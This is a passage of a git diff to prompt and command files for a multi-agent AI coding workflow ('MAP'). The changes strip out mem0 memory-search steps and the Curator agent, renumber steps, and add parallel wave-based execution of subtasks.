- **correct_approach** (REQUIRED, ≥150 chars, 5+ lines): Incorrect + correct code, why works, principle, {{language}} syntax - **key_insight** (REQUIRED, ≥50 chars): "When X, always Y because Z", actionable, memorable - **bullet_updates** (OPTIONAL): Only if Actor used bullets, tag helpful/harmful with reason -- **suggested_new_bullets** (OPTIONAL): Only if new (check mem0), meet quality framework, code_example for SECURITY/IMPL/PERF +- **suggested_new_bullets** (OPTIONAL): Only if genuinely new, meet quality framework, code_example for SECURITY/IMPL/PERF ## JSON Schema (For Validation) @@ -610,7 +556,7 @@ Skip if: trivial fix, no technical knowledge, no clear entities. }, "unverified_novelty": { "type": "boolean", - "description": "Set to true if mem0 was unavailable during analysis" + "description": "Set to true if novelty could not be verified during analysis" }, "error": { "type": "boolean", @@ -700,7 +646,7 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp **Output**: ```json { - "reasoning": "Achieved 9.0 overall (10/10 performance) via Redis caching decorator. Success factors: 1) Hierarchical keys (user:123:profile) enable pattern invalidation, 2) Decorator pattern = reusable, 3) TTL (1h) balances freshness/performance, 4) JSON serialization handles complex objects. Shows understanding: cache reads not writes, TTL prevents stale data, graceful failures. mem0 tiered search confirms Redis best practices (found in org tier). Reusable lesson: decorator pattern for cross-cutting concerns - separates caching from business logic (SRP).", + "reasoning": "Achieved 9.0 overall (10/10 performance) via Redis caching decorator. Success factors: 1) Hierarchical keys (user:123:profile) enable pattern invalidation, 2) Decorator pattern = reusable, 3) TTL (1h) balances freshness/performance, 4) JSON serialization handles complex objects. Shows understanding: cache reads not writes, TTL prevents stale data, graceful failures. 
Follows Redis best practices. Reusable lesson: decorator pattern for cross-cutting concerns - separates caching from business logic (SRP).", "error_identification": "No errors. Decorator handles hits (return cached) and misses (fetch, populate). Hierarchical keys (user:{id}:profile) enable smart invalidation. TTL prevents indefinite stale data. 10/10 performance score.", @@ -732,7 +678,7 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp **Output**: ```json { - "reasoning": "Partial success (6.5/10) reveals subtle async issue. Implementation works in isolated tests but fails under concurrent load. Sequential-thinking analysis: 1) Tests pass individually, 2) Production has concurrent requests, 3) Shared mutable state (self.results dict) accessed without locks, 4) Race condition: multiple coroutines modify dict simultaneously, 5) Root principle: async != thread-safe; shared state needs synchronization. Success factors: correct async/await usage, proper error handling. Failure factor: assumed async execution was sequential. mem0 tiered search found 'async-0023' in project tier discussing similar pattern.", + "reasoning": "Partial success (6.5/10) reveals subtle async issue. Implementation works in isolated tests but fails under concurrent load. Sequential-thinking analysis: 1) Tests pass individually, 2) Production has concurrent requests, 3) Shared mutable state (self.results dict) accessed without locks, 4) Race condition: multiple coroutines modify dict simultaneously, 5) Root principle: async != thread-safe; shared state needs synchronization. Success factors: correct async/await usage, proper error handling. Failure factor: assumed async execution was sequential.", "error_identification": "BatchProcessor.process_items() lines 15-22: self.results[item.id] = result modifies shared dict from multiple coroutines. Works in tests (sequential) but races in production (concurrent). 
Monitor PASS (no security), Evaluator 6.5/10 (reliability issues).", @@ -770,15 +716,15 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp **Output**: ```json { - "reasoning": "Successful REST implementation following established patterns. mem0 tiered search for 'REST endpoint validation' returns 5 existing patterns across tiers: input validation (rest-0012, project tier), error responses (rest-0015, org tier), async handling (rest-0018, project tier), authentication (rest-0021, org tier), rate limiting (rest-0024, org tier). Actor correctly applied these patterns - no novel learning. Success validates existing pattern completeness for standard REST patterns. Creating new pattern would duplicate rest-0012 content.", + "reasoning": "Successful REST implementation following established patterns. Actor correctly applied standard patterns for input validation, error responses, async handling, and authentication - no novel learning. Success validates existing pattern completeness for standard REST patterns.", "error_identification": "No errors. Implementation correctly: validates input with Pydantic (rest-0012), returns proper HTTP status codes (rest-0015), uses async/await consistently (rest-0018), checks JWT auth (rest-0021). All existing patterns applied correctly.", - "root_cause_analysis": "Success root cause: Actor followed established REST patterns from mem0. Patterns rest-0012 through rest-0024 provided comprehensive guidance. No novel decisions required - standard CRUD operation. This validates pattern coverage, not new learning opportunity.", + "root_cause_analysis": "Success root cause: Actor followed established REST patterns. Standard patterns provided comprehensive guidance. No novel decisions required - standard CRUD operation. This validates pattern coverage, not new learning opportunity.", "correct_approach": "Implementation follows existing patterns correctly. 
No correction needed.\n\n```python\n# Actor's implementation (correct)\n@router.post('/users', response_model=UserResponse)\nasync def create_user(user: UserCreate, db: AsyncSession = Depends(get_db)):\n # Validates via Pydantic (rest-0012)\n existing = await db.execute(select(User).where(User.email == user.email))\n if existing.scalar():\n raise HTTPException(status_code=409, detail='Email exists') # rest-0015\n new_user = User(**user.dict())\n db.add(new_user)\n await db.commit() # rest-0018\n return new_user\n```", - "key_insight": "When existing mem0 patterns comprehensively cover a pattern, successful application validates coverage rather than generating new patterns. Reflection value here is confirming pattern coverage, not creating redundant entries.", + "key_insight": "When existing patterns comprehensively cover a use case, successful application validates coverage rather than generating new patterns. Reflection value here is confirming pattern coverage, not creating redundant entries.", "bullet_updates": [ {"bullet_id": "rest-0012", "tag": "helpful", "reason": "Pydantic validation pattern correctly applied"}, @@ -805,14 +751,13 @@ Use {{language}}/{{framework}} syntax. 
Show specific library, configuration, exp - Provide generic advice without code ("best practices" useless) - Output markdown formatting (raw JSON only, no ```json```) - Make assumptions about unprovided code (analyze actual code) -- Create suggested_new_bullets without mem0 tiered search (avoid duplicates) +- Create suggested_new_bullets without checking for existing duplicates - Tag bullets without evidence (must be used in actor_code) - Forget minimum lengths (reasoning≥200, correct_approach≥150, key_insight≥50) ## What Reflector ALWAYS Does -- Use MCP tools (sequential-thinking complex, mem0 tiered search) -- Call mcp__mem0__map_tiered_search FIRST to check all tiers +- Use MCP tools (sequential-thinking for complex cases, context7 for libraries) - Perform 5 Whys root cause (beyond symptoms) - Include code examples (5+ lines, incorrect + correct) - Ground in {{language}}/{{framework}} (specific syntax) @@ -820,19 +765,18 @@ Use {{language}}/{{framework}} syntax. Show specific library, configuration, exp - Check suggested_new_bullets quality (100+ chars, code for impl/sec/perf) - Validate JSON before returning (required fields, structure) - Reference specific lines/functions in error_identification -- Note tier context when referencing existing patterns -Reflector's job is learning, not doing. Generic advice is unmemorable. Shallow analysis leads to repeat failures. JSON enables programmatic processing by Curator. +Reflector's job is learning, not doing. Generic advice is unmemorable. Shallow analysis leads to repeat failures. JSON enables programmatic processing. # VALIDATION CHECKLIST Before outputting: -- [ ] MCP Tools: Searched mem0 with mcp__mem0__map_tiered_search? Sequential-thinking for complex? +- [ ] MCP Tools: Used sequential-thinking for complex cases? context7 for library issues? - [ ] JSON: All fields? No markdown blocks? - [ ] Length: reasoning≥200, root_cause≥150, key_insight≥50? - [ ] Code: 5+ lines showing incorrect + correct? 
@@ -842,8 +786,7 @@ Before outputting: - [ ] Bullet Quality: 100+ chars? Code for impl/sec/perf? - [ ] Technology: {{language}}/{{framework}} syntax? - [ ] References: Specific lines/functions from actor_code? -- [ ] Deduplication: Checked all mem0 tiers before suggesting new bullets? -- [ ] Tier Context: Noted which tier existing patterns came from? +- [ ] Deduplication: Checked for existing similar patterns before suggesting new bullets? - [ ] Bullet Tags: Only bullets Actor used with evidence? diff --git a/.claude/agents/research-agent.md b/.claude/agents/research-agent.md index 7322923..bc942c9 100644 --- a/.claude/agents/research-agent.md +++ b/.claude/agents/research-agent.md @@ -276,24 +276,3 @@ Read( {{/if}} - - - - -## Available Patterns (ACE Learning) - -{{#if existing_patterns}} - -**Relevant patterns from mem0:** - -{{existing_patterns}} - -**Usage**: Reference these patterns in your search to find similar implementations. - -{{/if}} - -{{#unless existing_patterns}} -*No mem0 patterns available. Search results will help seed the knowledge base.* -{{/unless}} - - diff --git a/.claude/agents/task-decomposer.md b/.claude/agents/task-decomposer.md index a6e43fd..6b0bf45 100644 --- a/.claude/agents/task-decomposer.md +++ b/.claude/agents/task-decomposer.md @@ -33,7 +33,6 @@ machine-readable blueprint for the Actor/Monitor pipeline. │ └─ Derive category: 1-4=low, 5-6=medium, 7-10=high │ │ │ │ 3. GATHER CONTEXT (if complexity ≥ 3) │ -│ └─ ALWAYS: mcp__mem0__map_tiered_search (historical decompositions) │ │ └─ IF ambiguous: sequentialthinking │ │ └─ IF external lib: get-library-docs │ │ └─ Handle fallbacks if tools fail/return empty │ @@ -85,43 +84,19 @@ machine-readable blueprint for the Actor/Monitor pipeline. 
| Condition | Tool | Query Pattern | |-----------|------|---------------| -| **ALWAYS** (complexity ≥ 3) | mcp__mem0__map_tiered_search | `"feature implementation [type]"`, `"task decomposition [domain]"` | | Ambiguous/complex goal | sequentialthinking | Iterative refinement of scope and dependencies | | External library | get-library-docs | Setup/quickstart guides for initialization order | | Unfamiliar domain | deepwiki | `"How does [repo] structure [feature]?"` | **Skip MCP when**: complexity_score ≤ 2, trivial change, clear internal pattern exists -### Re-rank Retrieved Patterns - -After mcp__mem0__map_tiered_search, re-rank results by relevance to current decomposition: - -``` -FOR each pattern in results: - relevance_score = 0 - IF pattern.feature_type matches goal_type: relevance_score += 2 - IF pattern.language == {{language}}: relevance_score += 1 - IF pattern.success_rate > 0.8: relevance_score += 2 - IF pattern.subtask_count in [5..8]: relevance_score += 1 # optimal range - IF pattern.created_at > (now - 60_days): relevance_score += 1 - -SORT by relevance_score DESC -USE top 2 patterns as decomposition reference -DOCUMENT: "Referenced patterns: [IDs] with relevance scores [X, Y]" -``` - ### MCP Fallback Procedures ``` -IF mcp__mem0__map_tiered_search returns NO results: - → Document "No historical precedent" in assumptions - → Add +1 to Risk factor for affected subtask (e.g., Risk: +0 → +1) - → Add research subtask if total complexity >= 5 - IF MCP tool FAILS (timeout/unavailable): → Document in open_questions → Add +1 to Risk factor for ALL subtasks (uncertainty penalty) - → Add "Decomposition lacks historical validation" to risks + → Add "Decomposition lacks tool validation" to risks Note: Uncertainty adjustments modify the Risk factor in the formula, applied BEFORE the cap at 10. 
Example: Base(1)+Novelty(+1)+Deps(+1)+Scope(+2)+Risk(+0→+1 uncertainty)=6 @@ -498,7 +473,6 @@ When invoked with `mode: "re_decomposition"` from the orchestrator, you receive ## Before Submitting Decomposition **Analysis Completeness**: -- [ ] Ran mcp__mem0__map_tiered_search for similar features - [ ] Used sequential-thinking for complex/ambiguous goals - [ ] Checked library docs for initialization requirements - [ ] Identified all risks (not empty for medium/high complexity) @@ -570,9 +544,8 @@ If circular dependency detected (e.g., A→B→C→A): - [ ] Open questions flagged that need clarification before proceeding **MCP Tool Usage Verification**: -- [ ] Did you call mcp__mem0__map_tiered_search FIRST? (mandatory for non-trivial goals) - [ ] Did you use insights from MCP tools in your decomposition? -- [ ] If no historical context found, documented "No relevant history found" in analysis +- [ ] If MCP tools unavailable, documented limitations in analysis @@ -593,16 +566,6 @@ If circular dependency detected (e.g., A→B→C→A): **Subtask Context** (if refining existing decomposition): {{subtask_description}} -{{#if existing_patterns}} -## Relevant mem0 Knowledge - -The following patterns have been learned from previous successful implementations: - -{{existing_patterns}} - -**Instructions**: Use these patterns to inform your task decomposition strategy and identify proven implementation approaches. -{{/if}} - {{#if feedback}} ## Previous Decomposition Feedback @@ -724,7 +687,7 @@ Omit for simple CRUD, internal helpers, obvious logic. 
## Decomposition Process (5 Phases) **Phase 1: Understand** → Scope, boundaries, complexity estimate -**Phase 2: Context** → mcp__mem0__map_tiered_search, library docs, existing patterns +**Phase 2: Context** → Library docs, existing patterns, sequential thinking **Phase 3: Atomize** → Break into independently implementable+testable units **Phase 4: Dependencies** → Map prerequisites, order by foundation→dependent→parallel **Phase 5: Validate** → Testable criteria, realistic scores, no placeholders diff --git a/.claude/commands/map-debate.md b/.claude/commands/map-debate.md index b1db61e..acb5301 100644 --- a/.claude/commands/map-debate.md +++ b/.claude/commands/map-debate.md @@ -9,7 +9,7 @@ description: Debate-based MAP workflow with Opus arbiter for multi-variant synth 1. Execute steps in order without pausing; only ask user if (a) `task-decomposer` returns blocking `analysis.open_questions` with no subtasks OR (b) Monitor sets `escalation_required === true` 2. Use exact `subagent_type` specified — never substitute `general-purpose` 3. Call each agent individually — no combining or skipping steps -4. Max 5 Actor→Monitor retry iterations per subtask (separate from debate-arbiter retries in 2.7) +4. Max 5 Actor→Monitor retry iterations per subtask (separate from debate-arbiter retries in 2.7 Retry Loop) 5. **ALWAYS generate 3 variants** — no conditional check (unlike map-efficient Self-MoA) 6. Use **debate-arbiter with model=opus** for synthesis @@ -20,15 +20,14 @@ description: Debate-based MAP workflow with Opus arbiter for multi-variant synth ``` 1. DECOMPOSE → task-decomposer 2. FOR each subtask: - a. CONTEXT → mem0 tiered search (`mcp__mem0__map_tiered_search`) - b. RESEARCH → if existing code understanding needed - c. 3 Actors (parallel) → security/performance/simplicity focuses - d. 3 Monitors (parallel) → validate + extract decisions - e. debate-arbiter (opus) → cross-evaluate + synthesize - f. Final Monitor → validate synthesis - g. 
If invalid: retry with feedback (max 5) - h. If risk_level ∈ {high, medium}: → Predictor - i. Apply changes + a. RESEARCH → if existing code understanding needed + b. 3 Actors (parallel) → security/performance/simplicity focuses + c. 3 Monitors (parallel) → validate + extract decisions + d. debate-arbiter (opus) → cross-evaluate + synthesize + e. Final Monitor → validate synthesis + f. If invalid: retry with feedback (max 5) + g. If risk_level ∈ {high, medium}: → Predictor + h. Apply changes 3. SUMMARY → optionally suggest /map-learn ``` @@ -87,32 +86,7 @@ Before calling any agents for the subtask, build a single **AI Packet** with uni Pass this packet verbatim to Actor/Monitor/debate-arbiter/Predictor. Do NOT rename tags mid-flow. -### 2.1 Get Context + Re-rank - -```bash -# Patterns from mem0 (tiered: branch → project → org) -mcp__mem0__map_tiered_search(query="[subtask description]", limit=5) - -# Optional: broader conceptual lookup -mcp__mem0__map_tiered_search(query="[concept]", limit=5) -``` - -**Re-rank retrieved patterns** by relevance to current subtask: - -``` -FOR each pattern in retrieved_patterns: - relevance_score = evaluate: - - Domain match: Does pattern's domain match subtask? (+2) - - Technology overlap: Same language/framework? (+1) - - Recency: Created within 30 days? (+1) - - Success indicator: Marked validated/production? (+1) - - Complexity alignment: Similar complexity_score? (+1) - - SORT patterns by relevance_score DESC - PASS top 3 patterns to Actor as "context_patterns" -``` - -### 2.2 Research (Conditional) +### 2.1 Research (Conditional) **Call if:** refactoring, bug fixes, extending existing code, touching 3+ files **Skip for:** new standalone features, docs, config @@ -131,7 +105,7 @@ Max tokens: 1500" Pass `executive_summary` to Actor if `confidence >= 0.7`. 
-### 2.3 Quality-Stakes Assessment +### 2.2 Quality-Stakes Assessment **Purpose:** Determine deployment context and set minimum quality thresholds before launching Actor variants. @@ -161,7 +135,7 @@ quality_context = { **Rationale:** Prevents quality erosion in debate by establishing non-negotiable baselines before variants propose solutions. -### 2.4 Parallel Actors (3 Variants) +### 2.3 Parallel Actors (3 Variants) **ALWAYS call 3 Actors in parallel with different focuses:** @@ -172,7 +146,6 @@ Task( description="Implement subtask [ID] - Security (v1)", prompt="Implement with SECURITY focus: **AI Packet (XML):** [paste ...] -**mem0 Context:** [top context_patterns + relevance_score] **Quality Context:** deployment_risk_level={risk_level}, min_security={min_security}, min_functionality={min_functionality} ⚠️ Your variant MUST meet minimum quality thresholds. Quality is non-negotiable regardless of security focus. approach_focus: security, variant_id: v1, self_moa_mode: true @@ -185,7 +158,6 @@ Task( description="Implement subtask [ID] - Performance (v2)", prompt="Implement with PERFORMANCE focus: **AI Packet (XML):** [paste ...] -**mem0 Context:** [top context_patterns + relevance_score] **Quality Context:** deployment_risk_level={risk_level}, min_security={min_security}, min_functionality={min_functionality} ⚠️ Your variant MUST meet minimum quality thresholds. Quality is non-negotiable regardless of performance focus. approach_focus: performance, variant_id: v2, self_moa_mode: true @@ -198,7 +170,6 @@ Task( description="Implement subtask [ID] - Simplicity (v3)", prompt="Implement with SIMPLICITY focus: **AI Packet (XML):** [paste ...] -**mem0 Context:** [top context_patterns + relevance_score] **Quality Context:** deployment_risk_level={risk_level}, min_security={min_security}, min_functionality={min_functionality} ⚠️ Your variant MUST meet minimum quality thresholds. Quality is non-negotiable regardless of simplicity focus. 
approach_focus: simplicity, variant_id: v3, self_moa_mode: true @@ -206,7 +177,7 @@ Follow the Actor agent protocol output format. Ensure `decisions_made` is includ ) ``` -### 2.5 Parallel Monitors (3 Validations) +### 2.4 Parallel Monitors (3 Validations) Validate each variant in parallel: @@ -229,7 +200,7 @@ If a SpecificationContract is provided: include `spec_contract_compliant` + `spe Repeat for v2 and v3 in parallel. -### 2.6 debate-arbiter (Opus) +### 2.5 debate-arbiter (Opus) ``` Task( @@ -268,7 +239,7 @@ Include: comparison_matrix, decision_rationales, synthesis_reasoning (8 steps)." ) ``` -### 2.7 Final Monitor +### 2.6 Final Monitor Validate synthesized code: @@ -286,7 +257,7 @@ Return ONLY valid JSON following MonitorReviewOutput schema." ) ``` -### 2.8 Retry Loop +### 2.7 Retry Loop If Final Monitor returns `valid === false`: 1. Provide feedback including arbiter's synthesis_reasoning @@ -302,7 +273,7 @@ retry_context = { } ``` -### 2.9 Escalation Gate (AskUserQuestion) +### 2.8 Escalation Gate (AskUserQuestion) If Monitor returns `escalation_required === true`, ask user: @@ -321,7 +292,7 @@ AskUserQuestion(questions=[ ]) ``` -### 2.10 Conditional Predictor +### 2.9 Conditional Predictor ```python # Enhanced predictor decision: @@ -392,11 +363,11 @@ else: ) ``` -### 2.11 Apply Changes +### 2.10 Apply Changes Apply synthesized code via Write/Edit tools. Proceed to next subtask. -### 2.12 Gate 2: Tests Available / Run +### 2.11 Gate 2: Tests Available / Run After applying changes, run tests if available. @@ -408,7 +379,7 @@ After applying changes, run tests if available. If no tests found: mark gate as skipped and proceed. -### 2.13 Gate 3: Formatter / Linter +### 2.12 Gate 3: Formatter / Linter After tests gate, run formatter/linter checks if available. 
diff --git a/.claude/commands/map-debug.md b/.claude/commands/map-debug.md index 8e2cf6b..6bdd2a3 100644 --- a/.claude/commands/map-debug.md +++ b/.claude/commands/map-debug.md @@ -40,12 +40,7 @@ Debugging workflow focuses on analysis before implementation: ## Step 1: Analyze the Issue -Before calling task-decomposer, gather context and search mem0: - -```bash -# Search for similar debugging patterns -PATTERN_CONTEXT=$(mcp__mem0__map_tiered_search(query="debug [issue type]", section_filter="DEBUGGING_TECHNIQUES", limit=5)) -``` +Before calling task-decomposer, gather context: 1. **Read error logs/stack traces** (if provided in $ARGUMENTS) 2. **Identify affected files**: Use Grep/Glob to find relevant code @@ -64,7 +59,6 @@ Task( **Context:** - Error logs: [if available] - Affected files: [from analysis] -- Similar past issues: [from mem0 search] Output JSON with: - subtasks: array of {id, description, debug_type: 'investigation'|'fix'|'verification', acceptance_criteria} @@ -240,7 +234,6 @@ This is **completely optional**. 
Run it when debugging patterns are valuable for ## MCP Tools for Debugging -- `mcp__mem0__map_tiered_search` - Find similar past debugging sessions - `mcp__sequential-thinking__sequentialthinking` - Complex root cause analysis - `mcp__context7__get-library-docs` - Check library documentation for known issues - `mcp__deepwiki__ask_question` - Learn from how others solved similar issues diff --git a/.claude/commands/map-efficient.md b/.claude/commands/map-efficient.md index b91c5f3..658e473 100644 --- a/.claude/commands/map-efficient.md +++ b/.claude/commands/map-efficient.md @@ -24,7 +24,6 @@ State machine enforces sequencing, Python validates completion, hooks inject rem /map-efficient does NOT use these agents (by design): - **Evaluator** — quality scoring not needed; Monitor validates correctness directly - **Reflector** — lesson extraction is a separate step via `/map-learn` -- **Curator** — pattern storage is a separate step via `/map-learn` This is NOT a violation of MAP agent rules. Learning is decoupled into `/map-learn` (optional, run after workflow completes) to reduce token usage during execution. @@ -48,7 +47,7 @@ Both files must stay in sync. The orchestrator updates `step_state.json` on ever │ map-efficient.md (THIS FILE - ~540 lines) │ │ 1. Load state → Get next step instruction │ │ 2. Route to appropriate executor based on step phase │ -│ 3. Execute step (Actor/Monitor/mem0/tests/etc) │ +│ 3. Execute step (Actor/Monitor/tests/etc) │ │ 4. Validate completion → Update state │ │ 5. If more steps → Recurse; Else → Complete │ └─────────────────────────────────────────────────────────────┘ @@ -129,9 +128,11 @@ This eliminates reasoning overhead — the contract IS the specification.""" ) # After decomposer returns: -# 1. Extract subtask IDs from blueprint and register them in state: +# 1. Save the full blueprint JSON for wave computation: +# Write the decomposer output to .map//blueprint.json +# 2. 
Extract subtask IDs from blueprint and register them in state: # python3 .map/scripts/map_orchestrator.py set_subtasks ST-001 ST-002 ST-003 -# 2. Validate step completion: +# 3. Validate step completion: # python3 .map/scripts/map_orchestrator.py validate_step "1.0" ``` @@ -221,6 +222,76 @@ Then use the **Write** tool to create `.map//workflow_state.json`: } ``` +### Wave Computation (after INIT_STATE) + +After INIT_STATE (1.6) completes, compute execution waves from the dependency DAG: + +```bash +python3 .map/scripts/map_orchestrator.py set_waves --blueprint .map/${BRANCH}/blueprint.json +``` + +This reads the blueprint, builds a dependency graph, computes topological waves, +and splits waves by file conflicts. The result is stored in `step_state.json`. + +**Wave execution**: If waves are computed, subtasks within a wave run their Actor +and Monitor phases in parallel. Check wave status with: + +```bash +WAVE=$(python3 .map/scripts/map_orchestrator.py get_wave_step) +MODE=$(echo "$WAVE" | jq -r '.mode') +``` + +If `mode` is `"parallel"`, launch all actors in the wave in ONE message using +multiple `Task()` calls, then all monitors in ONE message. If `mode` is +`"sequential"`, use the standard single-subtask loop below. 
+ +**Parallel wave execution loop**: + +``` +loop: + WAVE = get_wave_step() + if WAVE.is_complete: goto final_verification + + if WAVE.mode == "sequential": + # Single subtask — same as standard behavior below + execute_current_sequential_loop() + else: + # === PARALLEL WAVE === + # Phase A: Prep (sequential per subtask - lightweight) + for each subtask in WAVE.subtasks: + build XML_PACKET, run CONTEXT_SEARCH, optional RESEARCH + + # Phase B: Parallel Actors + # Launch ALL Task(subagent_type="actor") calls in ONE message + # Example: Task(actor, "Implement ST-002") + Task(actor, "Implement ST-004") + + # Phase C: Parallel Monitors + # After all actors return, launch ALL monitors in ONE message + # Example: Task(monitor, "Validate ST-002") + Task(monitor, "Validate ST-004") + + # Phase D: Retry handling + # For each monitor that returned valid=false: + # Re-run actor + monitor for that subtask (serially) + # Track retries per subtask: validate_wave_step SUBTASK_ID STEP_ID + + # Phase E: Per-wave gates + # Run tests + linter ONCE for the entire wave + # pytest / npm test / etc. + + # Phase F: Advance wave + python3 .map/scripts/map_orchestrator.py advance_wave + + # Update workflow state for all subtasks in batch: + python3 .map/scripts/map_step_runner.py update_workflow_state_batch '[ + {"subtask_id": "ST-002", "step_name": "actor", "new_state": "ACTOR_CALLED"}, + {"subtask_id": "ST-002", "step_name": "monitor", "new_state": "MONITOR_PASSED"}, + {"subtask_id": "ST-004", "step_name": "actor", "new_state": "ACTOR_CALLED"}, + {"subtask_id": "ST-004", "step_name": "monitor", "new_state": "MONITOR_PASSED"} + ]' +``` + +Linear DAGs naturally degrade to single-subtask waves (identical to current behavior). 
+ ### Phase: XML_PACKET (2.0) ```python @@ -235,20 +306,6 @@ xml_packet = create_xml_packet(subtask) # Packet boundaries are unambiguous — agents parse by tag, not by heuristics ``` -### Phase: MEM0_SEARCH (2.1) - -```bash -# Tiered search: branch → project → org -mcp__mem0__map_tiered_search( - query="[subtask description]", - limit=5, - user_id="org:[org_name]", - run_id="proj:[project_name]:branch:[branch_name]" -) - -# Re-rank by relevance, pass top 3 to Actor -``` - ### Phase: RESEARCH (2.2) ```python @@ -283,10 +340,6 @@ Task( [paste from .map//current_packet.xml] - -[top context_patterns from mem0 + relevance_score] - - [AAG contract from decomposition: Actor -> Action -> Goal] @@ -466,7 +519,6 @@ Answer: [YES/NO - if NO, explain why not] Question 2: For EACH subtask, did I: - Create XML packet? [YES/NO per subtask] - - Call mem0 search? [YES/NO per subtask] - Call research-agent if 3+ files? [YES/NO/N/A per subtask] - Call Actor agent? [YES/NO per subtask] - Call Monitor agent after Actor? [YES/NO per subtask] @@ -521,7 +573,7 @@ if [ "$IS_COMPLETE" = "true" ]; then # Go to Step 3 else # CONTEXT DISTILLATION before recurse: - # Do NOT pass full RESEARCH logs, mem0 results, or Actor/Monitor transcripts. + # Do NOT pass full RESEARCH logs or Actor/Monitor transcripts. # Pass ONLY the distilled state to keep new context in SFT comfort zone (~4k tokens): # # 1. findings.md — distilled research output (not raw search logs) diff --git a/.claude/commands/map-fast.md b/.claude/commands/map-fast.md index ed16ee7..be195f3 100644 --- a/.claude/commands/map-fast.md +++ b/.claude/commands/map-fast.md @@ -6,9 +6,9 @@ description: Minimal workflow for small, low-risk changes (40-50% savings, NO le **⚠️ WARNING: Use for small, low-risk production changes only. Do not skip tests.** -Minimal agent sequence (40-50% token savings). Skips: Predictor, Reflector, Curator. +Minimal agent sequence (40-50% token savings). Skips: Predictor, Reflector. 
-**Consequences:** No impact analysis, no quality scoring, no learning, knowledge base never improves. +**Consequences:** No impact analysis, no quality scoring, no learning. Implement the following: @@ -30,7 +30,6 @@ Minimal agent sequence (token-optimized, reduced analysis depth): **Agents INTENTIONALLY SKIPPED:** - Predictor (no impact analysis) - Reflector (no lesson extraction) -- Curator (no mem0 pattern updates) **⚠️ CRITICAL:** This is NOT the full MAP workflow. Learning and impact analysis are disabled. @@ -122,12 +121,12 @@ After all subtasks completed: 2. Create commit with message 3. Summarize what was implemented -**Note:** No mem0 pattern updates (learning disabled). +**Note:** Learning disabled (Reflector skipped). ## Critical Constraints - MAX 3 iterations per subtask -- NO learning cycle (Reflector/Curator skipped) +- NO learning cycle (Reflector skipped) - NO impact analysis (Predictor skipped) - NO quality scoring diff --git a/.claude/commands/map-learn.md b/.claude/commands/map-learn.md index 5e53b41..69521c7 100644 --- a/.claude/commands/map-learn.md +++ b/.claude/commands/map-learn.md @@ -4,7 +4,7 @@ description: Extract and preserve lessons from completed workflows (OPTIONAL lea # MAP Learn - Post-Workflow Learning -**Purpose:** Standalone command to extract and preserve lessons AFTER completing any MAP workflow. +**Purpose:** Standalone command to extract lessons AFTER completing any MAP workflow. **When to use:** - After `/map-efficient` completes (to preserve patterns from the workflow) @@ -13,24 +13,18 @@ description: Extract and preserve lessons from completed workflows (OPTIONAL lea **What it does:** 1. Calls Reflector agent to analyze workflow outputs and extract patterns -2. Calls Curator agent to store patterns directly via mem0 MCP tools -3. 
Verifies patterns stored via `mcp__mem0__map_tiered_search` - -**Storage Architecture:** -- Branch tier: `run_id="proj:PROJECT:branch:BRANCH"` (branch-scoped patterns) -- Project tier: `run_id="proj:PROJECT"` (shared across branches) -- Org tier: `user_id="org:ORG"` only (shared across all projects) +2. Outputs a structured learning summary for the user to review **Workflow Summary Input:** $ARGUMENTS --- -## ⚠️ IMPORTANT: This is an OPTIONAL step +## IMPORTANT: This is an OPTIONAL step -**You are NOT required to run this command.** No MAP workflow includes automatic learning — learning is always a separate step via this command. +**You are NOT required to run this command.** No MAP workflow includes automatic learning -- learning is always a separate step via this command. Use /map-learn when: -- You completed /map-efficient, /map-debug, or /map-fast and want to preserve lessons +- You completed /map-efficient, /map-debug, or /map-fast and want to extract lessons - You want to batch-learn from multiple workflows at once - You want to manually trigger learning for custom workflows @@ -56,7 +50,7 @@ Check that $ARGUMENTS contains workflow summary: Workflow: /map-efficient "Add user authentication" Subtasks completed: 3 Files changed: api/auth.py, models/user.py, tests/test_auth.py -Iterations: 5 total (Actor→Monitor loops) +Iterations: 5 total (Actor->Monitor loops) Subtask 1 (Actor output): [paste Actor JSON output] @@ -73,7 +67,7 @@ Subtask 1 (Monitor result): ## Step 2: Reflector Analysis -**⚠️ MUST use subagent_type="reflector"** (NOT general-purpose): +**MUST use subagent_type="reflector"** (NOT general-purpose): ``` Task( @@ -84,15 +78,6 @@ Task( **Workflow Summary:** $ARGUMENTS -**MANDATORY FIRST STEP:** -1. Call mcp__mem0__map_tiered_search to check if similar patterns already exist across tiers -2. Only suggest new bullets if pattern is genuinely novel (not found in any tier) -3. 
Reference existing patterns with their tier context in your analysis - -**Tier Search Parameters:** -- user_id: 'org:ORG_NAME' (for org-level context) -- run_id: 'proj:PROJECT_NAME:branch:BRANCH_NAME' (for branch context with inheritance) - **Analysis Instructions:** Analyze holistically across ALL subtasks: @@ -111,106 +96,17 @@ Analyze holistically across ALL subtasks: **Output JSON with:** - key_insight: string (one sentence takeaway for entire workflow) -- patterns_used: array of strings (existing patterns applied successfully, with tier labels) +- patterns_used: array of strings (existing patterns applied successfully) - patterns_discovered: array of strings (new patterns worth preserving) - bullet_updates: array of {bullet_id, tag: 'helpful'|'harmful', reason} - suggested_new_bullets: array of {section, content, code_example, rationale} -- workflow_efficiency: {total_iterations, avg_per_subtask, bottlenecks: array of strings} -- mem0_duplicates_found: array of {pattern, tier, memory_id} (from tiered search results)" +- workflow_efficiency: {total_iterations, avg_per_subtask, bottlenecks: array of strings}" ) ``` -**Verification:** Check Reflector output contains evidence of `mcp__mem0__map_tiered_search` call: -- Should show: "mem0 tiered search found existing patterns in [tier]..." -- Or: "No similar patterns found in any tier. This appears to be a novel pattern." - -**If tiered search was NOT called:** Reflector did not follow instructions. Flag this as critical issue. - --- -## Step 3: Curator Storage - -**⚠️ MUST use subagent_type="curator"** (NOT general-purpose): - -``` -Task( - subagent_type="curator", - description="Store workflow learnings via mem0 MCP tools", - prompt="Store Reflector insights using mem0 MCP tools directly: - -**Reflector Insights:** -[paste Reflector JSON output from Step 2] - -**MANDATORY: Curator now calls mem0 MCP tools directly (NO JSON delta output)** - -**Curator will:** -1. 
